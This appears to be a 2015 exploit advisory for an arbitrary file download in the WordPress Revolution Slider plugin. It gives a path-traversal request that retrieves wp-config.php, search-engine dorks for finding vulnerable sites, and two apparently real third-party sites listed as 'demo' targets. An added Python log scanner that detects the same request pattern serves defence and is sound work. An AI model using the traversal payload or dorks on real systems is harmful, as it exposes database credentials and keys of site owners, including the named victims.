
WordPress plugin Revolution Slider Arbitrary File Download Vulnerability

Author: Iran Cyber Security Group, Published: 29-01-2015
##############################################################
# Exploit Title: WordPress plugin Revolution Slider Arbitrary File Download Vulnerability
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: JOK3R
#
# Dork 1: inurl:/wp-content/plugins/revolution-slider/
#
# Dork 2: index of /wp-content/plugins/revolution-slider/
#
# Date: 25-01-2015
#
# Tested on: Kali, Win8.1
#
# Category: webapps
#
# Platform: php
##############################################################

VULNERABILITY
##############

[~] http://www.Site.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

##############



demo 1: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php



demo 2: http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php



##############################################################
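
Added example, not part of the original advisory: a log check that flags requests matching the pattern shown under VULNERABILITY, where the img parameter of the revolution-slider_show_image action walks out of the image directory. The log lines are constructed samples in combined log format, and the list of image extensions is an assumption about what a legitimate img value looks like.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and action name are taken from the advisory's request.
ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION = "revolution-slider_show_image"
# Assumption: a legitimate img value names an image file.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jan/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '198.51.100.7 - - [25/Jan/2015:10:00:05 +0000] "GET /blog/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=%252e%252e%252fwp-config.php HTTP/1.1" 403 210',
    '192.0.2.10 - - [25/Jan/2015:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=uploads/2015/01/banner.jpg HTTP/1.1" 200 48211',
    '192.0.2.10 - - [25/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before inspection."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (status, img, reason) for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith(ENDPOINT):
        return None
    params = parse_qs(url.query)  # parse_qs already decodes one layer
    if ACTION not in params.get("action", []):
        return None
    img = fully_decode(params.get("img", [""])[0]).replace("\\", "/")
    if ".." in img.split("/"):
        return int(m.group(2)), img, "traversal"
    if not img.lower().endswith(IMAGE_EXT):
        return int(m.group(2)), img, "non-image"
    return None

def scan(lines):
    """Collect every suspicious hit from an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A traversal hit answered with status 200 means the file was likely served, so the database credentials and keys stored in wp-config.php should be treated as exposed.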

Contact Fb : fb.com/x.jok3r.x

Contact mail: n4tw0rk@yahoo.com


Special Thanks: Mohamad Nofozi - Sheytan Azzam - Root3r - Alireza promis - Mr moein - Kamran Hallish and all Iranian hackers and exploiters

##############################################################
